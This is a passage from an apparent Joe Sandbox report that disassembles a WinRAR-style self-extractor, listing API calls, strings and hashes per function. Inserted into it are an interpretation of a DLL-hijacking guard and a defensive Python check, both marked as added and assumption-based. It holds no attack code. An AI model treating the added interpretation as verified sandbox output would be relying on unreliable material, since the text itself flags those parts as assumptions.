              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prologItemTextWindow
              • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
              • API String ID: 810644672-3617005944
              • Opcode ID: 686abc29fbdf015e352aa8917efb92b6f8edb331696b42b949f308b0703a4b92
              • Instruction ID: 0d222534c3d3de4b5857f46aad893abf08ef6c720f76fb20a999d9f29bcdd529
              • Opcode Fuzzy Hash: 686abc29fbdf015e352aa8917efb92b6f8edb331696b42b949f308b0703a4b92
              • Instruction Fuzzy Hash: 2142C471944254ABEF25ABA0AD8AFBE7BFCEB05704F0001E5F605A71E1CFB45944CB62

              Control-flow Graph (function at b900cf; the rendered graph with its executed/not-executed colouring is not recoverable in text, so the edge list is omitted and the API calls on its paths are those listed under APIs below)
              APIs
              • GetModuleHandleW.KERNEL32(kernel32), ref: 00B900E4
              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B900F6
              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B90127
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B903D4
              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B903F0
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B90402
              • ReadFile.KERNEL32(00000000,?,00007FFE,00BB3BA4,00000000), ref: 00B90421
              • CloseHandle.KERNEL32(00000000), ref: 00B90479
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00B9048F
              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00B904E7
              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00B90510
              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00B9054A
                • Part of subcall function 00B90085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B900A0
                • Part of subcall function 00B90085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8EB86,Crypt32.dll,00000000,00B8EC0A,?,?,00B8EBEC,?,?,?), ref: 00B900C2
              • _swprintf.LIBCMT ref: 00B905BE
              • _swprintf.LIBCMT ref: 00B9060A
                • Part of subcall function 00B8400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B8401D
              • AllocConsole.KERNEL32 ref: 00B90612
              • GetCurrentProcessId.KERNEL32 ref: 00B9061C
              • AttachConsole.KERNEL32(00000000), ref: 00B90623
              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00B90649
              • WriteConsoleW.KERNEL32(00000000), ref: 00B90650
              • Sleep.KERNEL32(00002710), ref: 00B9065B
              • FreeConsole.KERNEL32 ref: 00B90661
              • ExitProcess.KERNEL32 ref: 00B90669
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
              • API String ID: 1201351596-3298887752
              • Opcode ID: bb2cc7ecab82be562ee8f1f770a5606e8be35dc3a0c74afabf6812871374c648
              • Instruction ID: 3c9a2abd73e35891330bedc908eda260a353b4a2088a3af84abfdc06a0cdb42a
              • Opcode Fuzzy Hash: bb2cc7ecab82be562ee8f1f770a5606e8be35dc3a0c74afabf6812871374c648
              • Instruction Fuzzy Hash: 1FD151B25583449FD730AF50D849BEFBAE8FF85B04F4009ADF58596250DBF09648CB62
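The string list and API sequence of the function at 00B900CF (GetModuleFileNameW, CompareStringW against DXGIDebug.dll, GetFileAttributesW, then a console message and ExitProcess) read as a guard against DLL search-order hijacking: the stub refuses to run when one of the named DLLs sits in its own folder, and separately resolves SetDllDirectoryW and SetDefaultDllDirectories to restrict the loader's search path. The check below is an added example that reimplements that file check in Python; it is not WinRAR's code and not taken from the report. Assumptions: this reading of the block's purpose, case-insensitive name matching (CompareStringW is used in the block but its flags are not interpreted here), and the order of the three %s operands in the refusal message.

```python
"""Check an executable's own folder for DLL names that could be planted there
for search-order hijacking, mirroring the guard visible in the function at 00B900CF.

Added example, not code from the report or from WinRAR. Assumptions: the three
names and the message come from the function's string list; matching is
case-insensitive; the %s order in the message (dll, folder, exe) is assumed.
"""
from __future__ import annotations

import os
import tempfile

# DLL names taken from the report's string list for the function at 00B900CF.
GUARDED_DLLS = ("DXGIDebug.dll", "dwmapi.dll", "uxtheme.dll")

# Message text from the same string list; the operand order is an assumption.
REFUSAL_MESSAGE = "Please remove %s from %s folder. It is unsecure to run %s until it is done."


def planted_in_listing(entries, names=GUARDED_DLLS) -> list[str]:
    """Return the directory entries whose name matches a guarded DLL, ignoring case.

    Pure function over a listing so it can be exercised without a file system;
    results follow the order of GUARDED_DLLS so the first hit is deterministic.
    """
    lowered = {e.lower(): e for e in entries}
    return [lowered[n.lower()] for n in names if n.lower() in lowered]


def planted_dlls(exe_path: str, names=GUARDED_DLLS) -> list[str]:
    """Full paths of guarded DLLs that sit next to exe_path (regular files only)."""
    folder = os.path.dirname(os.path.abspath(exe_path))
    entries = [e for e in os.listdir(folder) if os.path.isfile(os.path.join(folder, e))]
    return [os.path.join(folder, e) for e in planted_in_listing(entries, names)]


def refusal_message(exe_path: str, planted: str) -> str:
    """Fill the report's message with (dll, folder, exe); the order is assumed."""
    folder = os.path.dirname(os.path.abspath(exe_path))
    return REFUSAL_MESSAGE % (os.path.basename(planted), folder, os.path.basename(exe_path))


def safe_to_run(exe_path: str) -> tuple[bool, str | None]:
    """Mirror the stub's decision: (False, message) when a guarded DLL is planted."""
    hits = planted_dlls(exe_path)
    if hits:
        return False, refusal_message(exe_path, hits[0])
    return True, None


def demo() -> tuple[bool, str | None]:
    """Stage a throw-away folder holding a fake SFX and a planted DWMAPI.DLL, then check it."""
    with tempfile.TemporaryDirectory() as folder:
        exe = os.path.join(folder, "file.exe")
        open(exe, "wb").close()
        open(os.path.join(folder, "DWMAPI.DLL"), "wb").close()  # mixed case on purpose
        return safe_to_run(exe)


if __name__ == "__main__":
    print(demo())
```

The listing-based check is what the stub's GetFileAttributesW loop achieves; combining it with SetDefaultDllDirectories (which the stub resolves by name so it still loads on systems lacking the export) is what stops a DLL dropped beside the archive from being loaded before the system copy.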

              Control-flow Graph (function at b9bdf5; the rendered graph with its executed/not-executed colouring is not recoverable in text, so the edge list is omitted and the API calls on its paths are those listed under APIs below)
              APIs
              • __EH_prolog.LIBCMT ref: 00B9BDFA
                • Part of subcall function 00B9AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00B9AAFE
              • SetWindowTextW.USER32(?,?), ref: 00B9C127
              • _wcsrchr.LIBVCRUNTIME ref: 00B9C2B1
              • GetDlgItem.USER32(?,00000066), ref: 00B9C2EC
              • SetWindowTextW.USER32(00000000,?), ref: 00B9C2FC
              • SendMessageW.USER32(00000000,00000143,00000000,00BCA472), ref: 00B9C30A
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B9C335
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
              • API String ID: 3564274579-312220925
              • Opcode ID: 19f38e1c5f3f0d19817829503ab90738639e01b24d267f8799fe01bf854af935
              • Instruction ID: f9b7dcb3b904049320985a675ccd8995a9891ce8c5e9fc79901768a83155d3fb
              • Opcode Fuzzy Hash: 19f38e1c5f3f0d19817829503ab90738639e01b24d267f8799fe01bf854af935
              • Instruction Fuzzy Hash: 40E14B72D04219AADF25EBA4DC85EEE77FCEF19711F0040F6F509A30A1EB749A848B50

              Control-flow Graph (function at b8d341; the rendered graph with its executed/not-executed colouring is not recoverable in text, so the edge list is omitted and the API calls on its paths are those listed under APIs below)
              APIs
              • __EH_prolog.LIBCMT ref: 00B8D346
              • _wcschr.LIBVCRUNTIME ref: 00B8D367
              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00B8D328,?), ref: 00B8D382
              • __fprintf_l.LIBCMT ref: 00B8D873
                • Part of subcall function 00B9137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B8B652,00000000,?,?,?,00010442), ref: 00B91396
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
              • API String ID: 4184910265-980926923
              • Opcode ID: 204db174c050294e356954bac5a3c3c7e3593c79ee921bb303cc461ef3a17d63
              • Instruction ID: 5eb4d9edcfb2784ffa8168d576a9c88ef1508bcdedee45a5ed9b37366313dac1
              • Opcode Fuzzy Hash: 204db174c050294e356954bac5a3c3c7e3593c79ee921bb303cc461ef3a17d63
              • Instruction Fuzzy Hash: 7E1290B19002199ADF24FFA4DC81AEEB7F5EF14700F5445EAE506A71E1EB709E40CB64

              Control-flow Graph

              APIs
                • Part of subcall function 00B9AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9AC85
                • Part of subcall function 00B9AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9AC96
                • Part of subcall function 00B9AC74: IsDialogMessageW.USER32(00010442,?), ref: 00B9ACAA
                • Part of subcall function 00B9AC74: TranslateMessage.USER32(?), ref: 00B9ACB8
                • Part of subcall function 00B9AC74: DispatchMessageW.USER32(?), ref: 00B9ACC2
              • GetDlgItem.USER32(00000068,00BDECB0), ref: 00B9CB6E
              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00B9A632,00000001,?,?,00B9AECB,00BB4F88,00BDECB0), ref: 00B9CB96
              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00B9CBA1
              • SendMessageW.USER32(00000000,000000C2,00000000,00BB35B4), ref: 00B9CBAF
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9CBC5
              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00B9CBDF
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9CC23
              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00B9CC31
              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00B9CC40
              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00B9CC67
              • SendMessageW.USER32(00000000,000000C2,00000000,00BB431C), ref: 00B9CC76
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
              • String ID: \
              • API String ID: 3569833718-2967466578
              • Opcode ID: b9ee30f9026bc6f5d64ca10394c1aad4f29edfbb7996cdd8af2a308f74e08754
              • Instruction ID: e5ffd4aa4c10c4fc3f8bdb4ca39d7c54744f0621659c4a2f381f88c8b187ead7
              • Opcode Fuzzy Hash: b9ee30f9026bc6f5d64ca10394c1aad4f29edfbb7996cdd8af2a308f74e08754
              • Instruction Fuzzy Hash: BE31A171185785ABE301DF20DC8AFAB7FACEB86704F000518F6519B2E2DB655904D7B6

              Control-flow Graph

               Control-flow graph of the function at 00B9CE22 (rendered as an image in the original report; basic-block edge list not reproduced)
              APIs
              • ShellExecuteExW.SHELL32(?), ref: 00B9CF54
              • ShowWindow.USER32(?,00000000), ref: 00B9CF93
              • GetExitCodeProcess.KERNEL32(?,?), ref: 00B9CFCF
              • CloseHandle.KERNEL32(?), ref: 00B9CFF5
              • ShowWindow.USER32(?,00000001), ref: 00B9D084
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
              • String ID: $.exe$.inf
              • API String ID: 3686203788-2452507128
              • Opcode ID: 227570e0879bcc06e5e392627a8e0bba6f215d601ae456a838fd94fabe9ed596
              • Instruction ID: 7f3b1a7eee3936e965ab7bb012ceb0f033b25cd0522f112df66d06a7727912e8
              • Opcode Fuzzy Hash: 227570e0879bcc06e5e392627a8e0bba6f215d601ae456a838fd94fabe9ed596
              • Instruction Fuzzy Hash: 2F61F5705087809BDF319F25D864AABBFE9EF85300F0448BEF4C597261DBB19989CB52

              Control-flow Graph

               Control-flow graph of the function at 00BAA058 (rendered as an image in the original report; basic-block edge list not reproduced)
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00BA4E35,00BA4E35,?,?,?,00BAA2A9,00000001,00000001,3FE85006), ref: 00BAA0B2
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00BAA2A9,00000001,00000001,3FE85006,?,?,?), ref: 00BAA138
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00BAA232
              • __freea.LIBCMT ref: 00BAA23F
                • Part of subcall function 00BA8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BAC13D,00000000,?,00BA67E2,?,00000008,?,00BA89AD,?,?,?), ref: 00BA854A
              • __freea.LIBCMT ref: 00BAA248
              • __freea.LIBCMT ref: 00BAA26D
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: ByteCharMultiWide__freea$AllocateHeap
              • String ID:
              • API String ID: 1414292761-0
              • Opcode ID: 3237a4c062fee5a61a68f500eefddfd51e14bd09ea998b2d2172e6ecd29286a9
              • Instruction ID: efa5fd3d063cf3801acf4f2d31144da29facbf83c15676f7ddcf8ec4760f6a65
              • Opcode Fuzzy Hash: 3237a4c062fee5a61a68f500eefddfd51e14bd09ea998b2d2172e6ecd29286a9
              • Instruction Fuzzy Hash: CB51E072618206AFEB259E64CC81FBF77E9EB46750F1446A9FC04E6140EB35DC60C6B2

              Control-flow Graph

               Control-flow graph of the function at 00B899B0 (rendered as an image in the original report; basic-block edge list not reproduced)
              APIs
              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00B878AD,?,00000005,?,00000011), ref: 00B89A4C
              • GetLastError.KERNEL32(?,?,00B878AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B89A59
              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,00B878AD,?,00000005,?), ref: 00B89A8E
              • GetLastError.KERNEL32(?,?,00B878AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B89A96
              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B878AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B89ADB
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: File$CreateErrorLast$Time
              • String ID:
              • API String ID: 1999340476-0
              • Opcode ID: 3c799aa39e97e456a622444cf1cec40ba4884ec20fc071bc10b18d781d68a2d3
              • Instruction ID: 379b0a985adaed602c33c7d87c7d24f9682fcf8585c3053c3718985b003d2abd
              • Opcode Fuzzy Hash: 3c799aa39e97e456a622444cf1cec40ba4884ec20fc071bc10b18d781d68a2d3
              • Instruction Fuzzy Hash: F54166305447466FEB24AB20CC45BEABBD0FB01724F140759F5E4921E0E7B5A988CB91

              Control-flow Graph

               Control-flow graph of the function at 00B9AC74 (rendered as an image in the original report; basic-block edge list not reproduced)
              APIs
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9AC85
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9AC96
              • IsDialogMessageW.USER32(00010442,?), ref: 00B9ACAA
              • TranslateMessage.USER32(?), ref: 00B9ACB8
              • DispatchMessageW.USER32(?), ref: 00B9ACC2
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Message$DialogDispatchPeekTranslate
              • String ID:
              • API String ID: 1266772231-0
              • Opcode ID: 7576f0cdead6225b45f4834df2cc7a89ccf945c494078b8d5b24858116bcf029
              • Instruction ID: 593303fc2efb3e1525b85571ec6a75c15a5fe593531b60bba09b71bf6851d5fa
              • Opcode Fuzzy Hash: 7576f0cdead6225b45f4834df2cc7a89ccf945c494078b8d5b24858116bcf029
              • Instruction Fuzzy Hash: E1F01D71901169AB8F209BE19C8CDEB7FBCEE052517404455F805D7141EA34D505C7F1

              Control-flow Graph

               Control-flow graph of the function at 00B9A2C7 (rendered as an image in the original report; basic-block edge list not reproduced)
              APIs
              • GetClassNameW.USER32(?,?,00000050), ref: 00B9A2DE
              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00B9A315
                • Part of subcall function 00B917AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00B8BB05,00000000,.exe,?,?,00000800,?,?,00B985DF,?), ref: 00B917C2
              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B9A305
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AutoClassCompareCompleteFindNameStringWindow
              • String ID: EDIT
              • API String ID: 4243998846-3080729518
              • Opcode ID: bffcf8d10c9c281ebded9c6c0df2e9ffddf0aec6ab579657cbe364126b4284ec
              • Instruction ID: 501f10dc319dc1da2fe86ff9db50454e8493c9029d7336d939b4fd20e3a0ffff
              • Opcode Fuzzy Hash: bffcf8d10c9c281ebded9c6c0df2e9ffddf0aec6ab579657cbe364126b4284ec
              • Instruction Fuzzy Hash: 09F05E32A052286BEA2096649C09FAB77ACDB46B10F0400A6BD05A7181DB60A941C6EA

              Control-flow Graph

              APIs
                • Part of subcall function 00B90085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B900A0
                • Part of subcall function 00B90085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B8EB86,Crypt32.dll,00000000,00B8EC0A,?,?,00B8EBEC,?,?,?), ref: 00B900C2
              • OleInitialize.OLE32(00000000), ref: 00B9A34E
              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B9A385
              • SHGetMalloc.SHELL32(00BC8430), ref: 00B9A38F
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
              • String ID: riched20.dll
              • API String ID: 3498096277-3360196438
              • Opcode ID: 66fc46d15ad88153dcdc4aaa74663de1962e22299328ba66ddd560c2a36b3e12
              • Instruction ID: 98e2a51bf111f8262ce6c715dc83aac025bf29e78a781babc8d246418d3ff802
              • Opcode Fuzzy Hash: 66fc46d15ad88153dcdc4aaa74663de1962e22299328ba66ddd560c2a36b3e12
              • Instruction Fuzzy Hash: 6BF0F9B1D0020DABCB10AF99D8499EFFBFCEF95711F0041AAE914E2251DBB456058BA1

              Control-flow Graph

               Control-flow graph of the function at 00B9D287 (rendered as an image in the original report; basic-block edge list not reproduced)
              APIs
              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9D29D
              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9D2D9
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
               • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: EnvironmentVariable
              • String ID: sfxcmd$sfxpar
              • API String ID: 1431749950-3493335439
              • Opcode ID: 90f850878e65ae8e30e094448af17f54c85057858cf7c2833e005e28a600e1f5
              • Instruction ID: 44bcc167e886e9b008e244505982a88a2807bdd1448debd8aa8944909b2a4133
              • Opcode Fuzzy Hash: 90f850878e65ae8e30e094448af17f54c85057858cf7c2833e005e28a600e1f5
